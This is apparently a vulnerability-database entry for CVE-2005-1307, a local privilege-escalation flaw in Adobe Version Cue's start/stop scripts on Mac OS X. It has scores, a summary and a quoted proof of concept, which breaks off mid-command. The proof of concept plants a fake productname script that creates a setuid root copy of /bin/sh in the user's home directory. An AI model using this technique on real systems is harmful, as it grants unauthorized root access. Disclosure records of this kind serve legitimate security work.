7.2
CVSSv2

CVE-2005-1307

Published: 17/05/2005 Updated: 11/07/2017
CVSS v2 Base Score: 7.2 | Impact Score: 10 | Exploitability Score: 3.9
VMScore: 725
Vector: AV:L/AC:L/Au:N/C:C/I:C/A:C

Vulnerability Summary

The (1) stopserver.sh and (2) startserver.sh scripts in Adobe Version Cue on Mac OS X uses the current working directory to find and execute the productname.sh script, which allows local users to execute arbitrary code by copying and calling the scripts from a user-controlled directory.

Vulnerable Product Search on Vulmon Subscribe to Product

adobe version cue gold

apple mac os x 10.3.6

Exploits

Proof of concept: haven:~ fintler$ cd ~ haven:~ fintler$ id uid=502(fintler) gid=500(fintler) groups=500(fintler) haven:~ fintler$ echo "cp /bin/sh /Users/$USER;chmod 4755 /Users/$USER/sh;chown root /Users/$USER/sh" > productnamesh haven:~ fintler$ chmod 0755 /productnamesh haven:~ fintler$ ln -s /Applications/Adobe\ Version\ Cue/stopserver ...